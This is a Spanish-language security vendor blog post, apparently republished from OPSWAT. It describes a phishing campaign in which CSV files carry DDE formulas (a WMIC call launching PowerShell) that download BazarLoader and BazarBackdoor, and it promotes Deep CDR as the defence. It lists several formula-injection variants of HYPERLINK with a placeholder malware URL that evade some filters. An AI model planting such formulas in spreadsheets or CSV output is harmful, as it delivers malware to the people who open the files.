<iframe src="https://go.internationalit.com/l/906742/2022-07-05/7fgs5" width="100%" height="660" type="text/html" frameborder="0" allowTransparency="true" style="border: 0"></iframe>El investigador de malware Chris Campbell ha detectado una nueva campaña de phishing que utiliza archivos de texto CSV (valores separados por comas) especialmente diseñados para infectar los dispositivos de los usuarios con el troyano BazarBackdoor.
VEA TAMBIEN: ¿Puede un archivo de vídeo contener un virus?
Los archivos CSV se utilizan a menudo para intercambiar datos simples entre bases de datos y aplicaciones. Como este tipo de archivo solo contiene texto sin código ejecutable, muchos usuarios piensan que es inofensivo y abren el documento. No sospechan que el archivo podría ser un vector de amenaza a través del cual el malware puede ingresar a sus dispositivos si el archivo CSV se abre con aplicaciones que admiten Dynamic Data Exchange (DDE) como Microsoft Excel y OpenOffice Calc. Estas aplicaciones pueden ejecutar fórmulas y funciones en el archivo CSV.
Los ciberdelincuentes utilizan la función DDE para ejecutar comandos arbitrarios, que descargan e instalan el troyano BazarBackdoor, para comprometer y obtener acceso completo a las redes corporativas de las víctimas. En comparación con otros enfoques de ataque populares con macros maliciosas o códigos VBA ocultos en archivos de MS Office, las amenazas ocultas en documentos DDE son más difíciles de detectar.
Examinando cuidadosamente el archivo, podemos ver un =WmiC| (Comando de interfaz de administración de Windows) contenido en una de las columnas de datos. Si las víctimas sin darse cuenta permiten que se ejecute esta función DDE, se creará un comando de PowerShell. Los comandos abrirán una URL remota para descargar un BazarLoader y se instalará BazarBackdoor en la máquina de la víctima.
¿Cómo le ayuda Deep CDR de OPSWAT a defenderse de los ataques DDE?
Puede proteger su red de estas sofisticadas campañas de phishing limpiando los archivos adjuntos de correo electrónico antes de que lleguen a sus usuarios. Con la mentalidad de que cada archivo presenta una amenaza potencial y centrándose en la prevención en lugar de la simple detección, Deep CDR elimina todo el contenido activo de los archivos mientras mantiene la misma usabilidad y funcionalidad del archivo. Deep CDR es una de las seis tecnologías clave en MetaDefender, una plataforma avanzada de prevención de amenazas de OPSWAT que realmente adopta la metodología de seguridad Zero Trust .
Puede ver a continuación los detalles de la limpieza después de procesar el archivo CSV infectado con MetaDefender Core . Deep CDR neutraliza la fórmula en el archivo para que no se creen comandos de PowerShell, lo que evita que se descargue malware.
En ataques similares, los hackers utilizan fórmulas más complejas para evitar la detección. Normalmente, las fórmulas en MS Excel comienzan con un signo igual (=). Sin embargo, como esta aplicación también acepta fórmulas que comienzan con un signo diferente, como "=+" o "@", en lugar de solo "=", la fórmula destructiva en los archivos CSV puede ser:
=+HYPERLINK("<malware URL>")
=-HYPERLINK("<malware URL>")
=@HYPERLINK("<malware URL>")
+@HYPERLINK("<malware URL>")
-@HYPERLINK("<malware URL>")
Estos tipos de fórmulas pueden engañar a algunos sistemas CDR comunes. Sin embargo, OPSWAT Deep CDR puede lidiar fácilmente con esta táctica y producir archivos limpios y seguros para el consumo, neutralizando la amenaza.
Además, la tecnología OPSWAT MetaDefender Multiscanning utiliza más de 35 motores antimalware y mejora significativamente la detección de amenazas conocidas y desconocidas (Zero Day).
Fuente: OPSWAT
Cuente con International IT y OPSWAT para implementar una metodología Zero Trust y proteger la infraestructura crítica de su empresa.
Descubra nuestras soluciones avanzadas, robustas y seguras para NOC & SOC, Zero Trust, Next-Gen Firewalls, LGPD, Hardware, Monitoramento de Rede, Transferência de Arquivos Gerenciada, Consultoria de TIC, Treinamentos, Sustentação de Aplicações, Outsourcing, Licenciamento Geral y Help Desk.
